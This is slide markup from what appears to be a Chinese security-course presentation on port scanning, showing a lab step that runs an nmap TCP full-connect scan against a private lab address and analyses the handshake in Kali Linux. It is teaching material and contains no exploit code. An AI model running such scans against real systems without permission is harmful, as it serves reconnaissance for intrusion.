              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="文本框 103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5626100" y="1084580"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5.Kali Linux收到目标主机回应的包，响应一个报文，进入Established状态，如图2-2-38所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5626100" y="1729740"/>
            <a:ext cx="5276850" cy="3448050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="文本框 104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5626100" y="5177790"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-38 分析返回数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP协议全连接的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="文本框 104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5827395" y="1389380"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用“nmap -sT 192.168.172.129”命令对目标主机进行TCP全连接扫描，如图2-2-39所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5827395" y="2034540"/>
            <a:ext cx="5238750" cy="2552700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="文本框 105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5827395" y="4587240"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-39 TCP全连接扫描结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP协议全连接的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
